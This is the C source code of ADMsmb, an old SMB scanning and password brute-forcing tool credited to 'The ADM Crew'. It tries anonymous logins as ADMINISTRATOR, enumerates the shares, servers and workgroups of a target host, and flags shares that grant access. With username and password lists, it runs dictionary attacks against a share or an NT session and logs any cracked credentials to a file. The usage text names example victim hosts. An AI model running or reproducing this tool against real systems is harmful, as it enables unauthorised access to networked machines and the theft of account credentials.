#define VERSION_ADM_SMB "0.3 FreeBSD" #define TRACEDEF "ADMsmb.output" #ifndef _QCOMPR #define _QCOMPR int qcompr(const void *a, const void *b) { return strcasecmp((const char *) a, (const char *) b); } #endif #ifdef SYSLOG #undef SYSLOG #endif #include "includes.h" #include "ADMsmb.c" #ifndef REGISTER #define REGISTER 0 #endif pstring cur_dir = "\\"; pstring cd_path = ""; extern pstring service; extern pstring desthost; extern pstring myname; extern pstring myhostname; extern pstring password; extern pstring username; extern pstring workgroup; char *cmdstr = ""; extern BOOL got_pass; extern BOOL no_pass; extern BOOL connect_as_printer; extern BOOL connect_as_ipc; extern struct in_addr ipzero; extern BOOL doencrypt; extern pstring user_socket_options; FILE *trace = NULL; int silly_server = 0; /* 30 second timeout on most commands */ #define CLIENT_TIMEOUT (30*1000) #define SHORT_TIMEOUT (5*1000) /* value for unused fid field in trans2 secondary request */ #define FID_UNUSED (0xFFFF) extern int name_type; extern int max_protocol; time_t newer_than = 0; int archive_level = 0; extern pstring debugf; extern int DEBUGLEVEL; BOOL translation = False; extern int cnum; extern int mid; extern int pid; extern int tid; extern int gid; extern int uid; extern BOOL have_ip; extern int max_xmit; static int interpret_long_filename (int level, char *p, file_info * finfo); static void dir_action (char *inbuf, char *outbuf, int attribute, file_info * finfo, BOOL recurse_dir, void (*fn) (file_info *), BOOL longdir, BOOL dirstoo); static int interpret_short_filename (char *p, file_info * finfo); static BOOL do_this_one (file_info * finfo); /* clitar bits insert */ extern int blocksize; extern BOOL tar_inc; extern BOOL tar_reset; /* clitar bits end */ int myumask = 0755; extern pstring scope; BOOL prompt = True; int printmode = 1; BOOL recurse = False; BOOL lowercase = False; struct in_addr dest_ip; #define SEPARATORS " \t\n\r" BOOL abort_mget = True; extern int Protocol; extern BOOL readbraw_supported; extern BOOL writebraw_supported; pstring fileselection = ""; extern file_info def_finfo; /* timing globals */ int get_total_size = 0; int get_total_time_ms = 0; int put_total_size = 0; int put_total_time_ms = 0; /* totals globals */ int dir_total = 0; extern int Client; /* the ADMhack variable */ char *SHARELIST[255]; #define USENMB #define CNV_LANG(s) dos_to_unix(s,False) #define CNV_INPUT(s) unix_to_dos(s,True) /**************************************************************************** send an SMBclose on an SMB file handle ****************************************************************************/ void cli_smb_close (char *inbuf, char *outbuf, int clnt_fd, int c_num, int f_num) { bzero (outbuf, smb_size); set_message (outbuf, 3, 0, True); CVAL (outbuf, smb_com) = SMBclose; SSVAL (outbuf, smb_tid, c_num); cli_setup_pkt (outbuf); SSVAL (outbuf, smb_vwv0, f_num); SIVALS (outbuf, smb_vwv1, -1); send_smb (clnt_fd, outbuf); client_receive_smb (clnt_fd, inbuf, CLIENT_TIMEOUT); } /**************************************************************************** make a directory of name "name" ****************************************************************************/ static BOOL do_mkdir (char *name) { char *p; char *inbuf, *outbuf; inbuf = (char *) malloc (BUFFER_SIZE + SAFETY_MARGIN); outbuf = (char *) malloc (BUFFER_SIZE + SAFETY_MARGIN); if (!inbuf || !outbuf) { DEBUG (0, ("out of memory\n")); return False; } bzero (outbuf, smb_size); set_message (outbuf, 0, 2 + strlen (name), True); CVAL (outbuf, smb_com) = SMBmkdir; SSVAL (outbuf, smb_tid, cnum); cli_setup_pkt (outbuf); p = smb_buf (outbuf); *p++ = 4; pstrcpy (p, name); send_smb (Client, outbuf); client_receive_smb (Client, inbuf, CLIENT_TIMEOUT); if (CVAL (inbuf, smb_rcls) != 0) { DEBUG (0, ("%s making remote directory %s\n", smb_errstr (inbuf), CNV_LANG (name))); free (inbuf); free (outbuf); return (False); } free (inbuf); free (outbuf); return (True); } /**************************************************************************** try and browse available connections on a host ****************************************************************************/ static BOOL browse_host (BOOL sort) { #ifdef NOSTRCASECMP /* If strcasecmp is already defined, remove it. */ #ifdef strcasecmp #undef strcasecmp #endif /* strcasecmp */ #define strcasecmp StrCaseCmp #endif /* NOSTRCASECMP */ char *rparam = NULL; char *rdata = NULL; char *p; int rdrcnt, rprcnt; pstring param; int count = -1; /* now send a SMBtrans command with api RNetShareEnum */ p = param; SSVAL (p, 0, 0); /* api number */ p += 2; pstrcpy (p, "WrLeh"); p = skip_string (p, 1); pstrcpy (p, "B13BWz"); p = skip_string (p, 1); SSVAL (p, 0, 1); SSVAL (p, 2, BUFFER_SIZE); p += 4; if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p, param), 0, 0, 1024, BUFFER_SIZE, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) { int res = SVAL (rparam, 0); int converter = SVAL (rparam, 2); int i; BOOL long_share_name = False; if (res == 0) { count = SVAL (rparam, 4); p = rdata; if (count > 0) { printf ("\n\tSharename Type Comment\n"); printf ("\t--------- ---- -------\n"); fprintf (trace, "\n\tSharename Type Comment\n"); fprintf (trace, "\t--------- ---- -------\n"); } if (sort) qsort (p, count, 20, qcompr); for (i = 0; i < 255; i++) { free (SHARELIST[i]); SHARELIST[i] = NULL; } for (i = 0; i < count; i++) { char *sname = p; int type = SVAL (p, 14); int comment_offset = IVAL (p, 16) & 0xFFFF; fstring typestr; *typestr = 0; switch (type) { case STYPE_DISKTREE: fstrcpy (typestr, "Disk"); break; case STYPE_PRINTQ: fstrcpy (typestr, "Printer"); break; case STYPE_DEVICE: fstrcpy (typestr, "Device"); break; case STYPE_IPC: fstrcpy (typestr, "IPC"); break; } printf ("\t%-15.15s%-10.10s%s\n", sname, typestr, comment_offset ? rdata + comment_offset - converter : ""); fprintf (trace, "\t%-15.15s%-10.10s%s\n", sname, typestr, comment_offset ? rdata + comment_offset - converter : ""); SHARELIST[i] = calloc (1, strlen (sname) + 1); if (SHARELIST == NULL) printf ("behu sharelist == null !\n"); memcpy (SHARELIST[i], sname, strlen (sname)); if (strlen (sname) > 8) long_share_name = True; p += 20; } } } if (rparam) free (rparam); if (rdata) free (rdata); return (count > 0); } /**************************************************************************** get some server info ****************************************************************************/ static void server_info (void) { char *rparam = NULL; char *rdata = NULL; char *p; int rdrcnt, rprcnt; pstring param; bzero (param, sizeof (param)); p = param; SSVAL (p, 0, 63); /* NetServerGetInfo()? */ p += 2; pstrcpy (p, "WrLh"); p = skip_string (p, 1); pstrcpy (p, "zzzBBzz"); p = skip_string (p, 1); SSVAL (p, 0, 10); /* level 10 */ SSVAL (p, 2, 1000); p += 6; if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p, param), 0, 0, 6, 1000, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) { int res = SVAL (rparam, 0); int converter = SVAL (rparam, 2); if (res == 0) { p = rdata; printf ("\nServer=[%s] User=[%s] Workgroup=[%s] Domain=[%s]\n", rdata + SVAL (p, 0) - converter, rdata + SVAL (p, 4) - converter, rdata + SVAL (p, 8) - converter, rdata + SVAL (p, 14) - converter); } } if (rparam) free (rparam); if (rdata) free (rdata); return; } /**************************************************************************** try and browse available connections on a host ****************************************************************************/ static BOOL list_servers (char *wk_grp) { char *rparam = NULL; char *rdata = NULL; int rdrcnt, rprcnt; char *p, *svtype_p; pstring param; int uLevel = 1; int count = 0; BOOL ok = False; BOOL generic_request = False; if (strequal (wk_grp, "WORKGROUP")) { /* we won't specify a workgroup */ generic_request = True; } /* now send a SMBtrans command with api ServerEnum? */ p = param; SSVAL (p, 0, 0x68); /* api number */ p += 2; pstrcpy (p, generic_request ? "WrLehDO" : "WrLehDz"); p = skip_string (p, 1); pstrcpy (p, "B16BBDz"); p = skip_string (p, 1); SSVAL (p, 0, uLevel); SSVAL (p, 2, BUFFER_SIZE - SAFETY_MARGIN); /* buf length */ p += 4; svtype_p = p; p += 4; if (!generic_request) { pstrcpy (p, wk_grp); p = skip_string (p, 1); } /* first ask for a list of servers in this workgroup */ SIVAL (svtype_p, 0, SV_TYPE_ALL); if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p + 4, param), 0, 0, 8, BUFFER_SIZE - SAFETY_MARGIN, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) { int res = SVAL (rparam, 0); int converter = SVAL (rparam, 2); int i; if (res == 0) { char *p2 = rdata; count = SVAL (rparam, 4); if (count > 0) { printf ("\n\nThis machine has a browse list:\n"); printf ("\n\tServer Comment\n"); printf ("\t--------- -------\n"); fprintf (trace, "\n\nThis machine has a browse list:\n"); fprintf (trace, "\n\tServer Comment\n"); fprintf (trace, "\t--------- -------\n"); } for (i = 0; i < count; i++) { char *sname = p2; int comment_offset = IVAL (p2, 22) & 0xFFFF; printf ("\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : ""); fprintf (trace, "\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : ""); ok = True; p2 += 26; } } } if (rparam) { free (rparam); rparam = NULL; } if (rdata) { free (rdata); rdata = NULL; } /* now ask for a list of workgroups */ SIVAL (svtype_p, 0, SV_TYPE_DOMAIN_ENUM); if (cli_call_api (PIPE_LANMAN, 0, PTR_DIFF (p + 4, param), 0, 0, 8, BUFFER_SIZE - SAFETY_MARGIN, &rprcnt, &rdrcnt, param, NULL, NULL, &rparam, &rdata)) { int res = SVAL (rparam, 0); int converter = SVAL (rparam, 2); int i; if (res == 0) { char *p2 = rdata; count = SVAL (rparam, 4); if (count > 0) { printf ("\n\nThis machine has a workgroup list:\n"); printf ("\n\tWorkgroup Master\n"); printf ("\t--------- -------\n"); fprintf (trace, "\n\nThis machine has a workgroup list:\n"); fprintf (trace, "\n\tWorkgroup Master\n"); fprintf (trace, "\t--------- -------\n"); } for (i = 0; i < count; i++) { char *sname = p2; int comment_offset = IVAL (p2, 22) & 0xFFFF; printf ("\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : ""); fprintf (trace, "\t%-16.16s %s\n", sname, comment_offset ? rdata + comment_offset - converter : ""); ok = True; p2 += 26; } } } if (rparam) free (rparam); if (rdata) free (rdata); return (ok); } /**************************************************************************** main program ****************************************************************************/ main (int argc, char **argv) { FILE *U = NULL; FILE *P = NULL; int c; char didi[255]; char hostoname[255]; char netbioz[255]; u_long bha; bzero (didi,sizeof(didi)); bzero (hostoname,sizeof(hostoname)); bzero (netbioz,sizeof(netbioz)); if ( argc < 2 ) { printf ("*** The ADM Crew, ported to FreeBSD by *IRQ* ***\n"); printf ("ADMsmb %s\n",VERSION_ADM_SMB); printf ("usage: ADMsmb [-u -p -d -o -b]\n"); printf ("-u : userlist\n"); printf ("-p : passwordlist\n"); printf ("-d : directory to bruteforce\n"); printf ("-o : logfile \n"); printf ("-b : try this if ADM-smb can't get netbios name of remote host \n"); printf (" note: you need to run ADM-smb at root to use -b \n"); printf ("example\n" "simple scan:\n" "ADMsmb www.burn.ms.com\n\n" "brute force a directory:\n" "ADMsmb www.burn.hp.com -d HOMES -u userlist -p passwdlst\n\n" "brute force a session:\n" "ADMsmb www.burn-down_the.gov -u userlist -p passwdlst\n\n"); printf ("dont forget to log use -o =)!\n"); printf ("note: we log by default in %s\n",TRACEDEF); exit (-1); } memcpy (hostoname,argv[1],strlen(argv[1])); while ((c = getopt(argc, argv,"u:p:d:bo:x:n")) != -1) { switch (c) { case 'u': U = fopen (optarg,"r"); if ( U == NULL ) { printf ("failed to open the username file!\n"); exit (-1); } break; case 'p': P = fopen (optarg,"r"); if ( P == NULL ) { printf("failed to open password file !\n"); exit (-1); } break; case 'd': pstrcpy (didi,optarg); break; case 'b': silly_server=1; break; case 'o': trace = fopen(optarg,"w"); if ( trace == NULL ) { printf("failed to open log file !\n"); exit (-1); } break; default: break; } } if ( trace == NULL) trace = fopen(TRACEDEF,"w"); puts(" ADM-smb 0.3 FreeBSD version by *IRQ* "); sleep (1); bha = host2ip(hostoname); if ( ADMsmb (bha,netbioz) == -1 ) { printf ("cant get the netbios name :>\n"); exit(-1); } printf("netbios name of %s is %s\n",hostoname,netbioz); fprintf(trace," scan of %s \n",hostoname); if ( didi[0] != 0 ) ADMsmb2 ( hostoname, netbioz,didi, U, P); else ADMsmb2 ( hostoname, netbioz,NULL, U, P); fclose (trace); } /**************************************************************************/ /* here is the mainly function ! */ /* ADMsmb2( hostname, netbios name, directory , userfile , password file */ /* if Direc == NULL && userfile == NULL && password file */ /* simple scaning */ /* if Direc != NULL && usefile != NULL && password file != NULL */ /* brute force the directory "Direc" */ /* if Direc == NULL && userfile != NULL && password file != NULL */ /* brute force a session (ideal for NT4 system who dont allow you to */ /* browse the host without login /password ) */ /**************************************************************************/ int ADMsmb2 ( char *ipz, char netbios_name[255], char *Direc, FILE * userfile, FILE * passwdfile) { fstring base_directory; char *pname = "ADMsmb"; char USERNAME_[17]; char PASSWORD_[17]; int port = SMB_PORT; int opt; extern FILE *dbf; extern char *optarg; extern int optind; pstring query_host; BOOL message = False; BOOL nt_domain_logon = False; extern char tar_type; static pstring servicesf = CONFIGFILE; pstring term_code; pstring new_name_resolve_order; char *p; char *titpointeur; int save_debuglevel = -1; int listnum = 0; *term_code = 0; *query_host = 0; *base_directory = 0; *new_name_resolve_order = 0; DEBUGLEVEL = 2; setup_logging (pname, True); TimeInit (); charset_initialise (); pid = 0; uid = 0; gid = 0; mid = 0 + 100; pstrcpy (username, "ADMINISTRATOR"); strupper (username); pstrcpy (password, ""); strupper (password); pstrcpy (workgroup, "WORKGROUP"); strupper (workgroup); dest_ip = *interpret_addr2 (ipz); have_ip = True; pstrcpy (myname, netbios_name); pstrcpy (query_host, netbios_name); /* here we trying to connect without pass */ got_pass = 0; if (!get_myname (myhostname, NULL)) { DEBUG (0, ("Failed to get my hostname.\n")); } load_interfaces (); /* trying to browse the victim */ if (passwdfile == NULL && userfile == NULL) { slprintf (service, sizeof (service) - 1, "\\\\%s\\IPC$", query_host); strupper (service); connect_as_ipc = True; if (cli_open_sockets (port)) { if (cli_send_login (NULL, NULL, True, True, NULL) != False) { server_info (); if (!browse_host (True)) { sleep (1); browse_host (True); } if (!list_servers (workgroup)) { sleep (1); list_servers (workgroup); } cli_send_logout (NULL, NULL); } close_sockets (); } else { printf ("samba session fallied :-<\n"); return (-1); } } if (SHARELIST[listnum] != NULL && userfile == NULL) { printf ("> scan of %s <\n\n", ipz); while (SHARELIST[listnum] != NULL) { slprintf (service, sizeof (service) - 1, "\\\\%s\\%s", query_host, SHARELIST[listnum]); strupper (service); if (cli_open_sockets (port)) { if (strcmp (SHARELIST[listnum], "IPC$") == 0) connect_as_ipc = True; else connect_as_ipc = 0; printf ("checking %s ", service); fprintf (trace,"checking %s ", service); if (cli_send_login (NULL, NULL, True, True, NULL) != False) { printf ("\t\033[32mACCESS GRANTED\033[0m\n", service); fprintf (trace, "\tACCESS GRANTED\n", service); cli_send_logout (NULL, NULL); } else { printf ("\tSecure \n"); fprintf (trace, "\tSecure \n"); } close_sockets (); listnum++; } } } /* We perform a brute force ! on a directory */ if (Direc != NULL && SHARELIST[0] == NULL) { printf ("<---> We perform a brutal force on %s for the directory %s <--->\n", ipz, Direc); fprintf (trace, "<---> We perform a brutal force on %s for the directory %s <--->\n" ,ipz, Direc); while (!feof (userfile)) { memset (USERNAME_, 0, sizeof (USERNAME_)); fgets (USERNAME_, sizeof (USERNAME_), userfile); printf ("\n\n"); titpointeur = strchr (USERNAME_, '\n'); if (titpointeur != NULL) *(titpointeur + 0) = 0; else continue; while (!feof (passwdfile)) { memset (PASSWORD_, 0, sizeof (PASSWORD_)); fgets (PASSWORD_, sizeof (PASSWORD_), passwdfile); titpointeur = strchr (PASSWORD_, '\n'); if (titpointeur != NULL) *(titpointeur + 0) = 0; else continue; if (test_passwd (USERNAME_, PASSWORD_, query_host, Direc) == 1) { printf ("\033[31m<--->\033[32m ACCESS GRANTED \033[31m<--->\033[0m\n" "\033[31m<--->\033[0m\033[1m %s //%s/%s login:%s password: %s \033[0m\033[31m<--->\033[0m\n\n", ipz, query_host, Direc, USERNAME_, PASSWORD_); fprintf (trace, "<--->ACCESS GRANTED <--->\n" "**** <---> %s //%s/%s login:%s password: %s <---> ****\n\n", ipz, query_host, Direc, USERNAME_, PASSWORD_); } else printf ("<---> Session failed with %s %s for //%s/%s <--->\n", USERNAME_, PASSWORD_, query_host, Direc); } rewind (passwdfile); } } if (Direc == NULL && SHARELIST[0] == NULL && userfile != NULL && passwdfile != NULL) { printf ("<---> We trying to etablish a session on %s and browse is share list<--->\n", ipz); fprintf (trace, "<---> We trying to etablish a session on %s and browse is share list<--->\n", ipz); while (!feof (userfile)) { memset (USERNAME_, 0, sizeof (USERNAME_)); fgets (USERNAME_, sizeof (USERNAME_), userfile); printf ("\n\n"); titpointeur = strchr (USERNAME_, '\n'); if (titpointeur != NULL) *(titpointeur + 0) = 0; else continue; while (!feof (passwdfile)) { memset (PASSWORD_, 0, sizeof (PASSWORD_)); fgets (PASSWORD_, sizeof (PASSWORD_), passwdfile); titpointeur = strchr (PASSWORD_, '\n'); if (titpointeur != NULL) *(titpointeur + 0) = 0; else continue; if (test_passwd_nt (USERNAME_, PASSWORD_, query_host) == 1) { printf ("\033[31m<--->\033[32m ACCESS GRANTED \033[31m<--->\033[0m\n" "\033[31m<--->\033[0m\033[1m login:%s password: %s \033[0m\033[31m<--->\033[0m\n\n", USERNAME_, PASSWORD_); fprintf (trace, "<--->ACCESS GRANTED <--->\n" "**** <--->login:%s password: %s <---> ****\n\n", USERNAME_, PASSWORD_); } else printf ("<---> Session failed with %s %s <--->\n", USERNAME_, PASSWORD_); } rewind (passwdfile); } } } int test_passwd_nt (char *LOGINZ, char *PASSWORDZ, char *nameofhost) { int retour = -1; pstrcpy (username, LOGINZ); strupper (username); pstrcpy (password, PASSWORDZ); strupper (password); slprintf (service, sizeof (service) - 1, "\\\\%s\\IPC$", nameofhost); strupper (service); connect_as_ipc = True; if (cli_open_sockets (SMB_PORT)) { if (cli_send_login (NULL, NULL, True, True, NULL) != False) { retour = 1; if (!browse_host (True)) { sleep (1); browse_host (True); } if (!list_servers (workgroup)) { sleep (1); list_servers (workgroup); } cli_send_logout (NULL, NULL); } close_sockets (); } return (retour); } int test_passwd (char *LOGINZ, char *PASSWORDZ, char *nameofhost, char *directory) { int retour = -1; pstrcpy (username, LOGINZ); strupper (username); pstrcpy (password, PASSWORDZ); strupper (password); slprintf (service, sizeof (service) - 1, "\\\\%s\\%s", nameofhost, directory); strupper (service); if (cli_open_sockets (SMB_PORT)) { connect_as_ipc = 0; if (cli_send_login (NULL, NULL, True, True, NULL) != False) { retour = 1; cli_send_logout (NULL, NULL); } else retour = -1; close_sockets (); } return (retour); }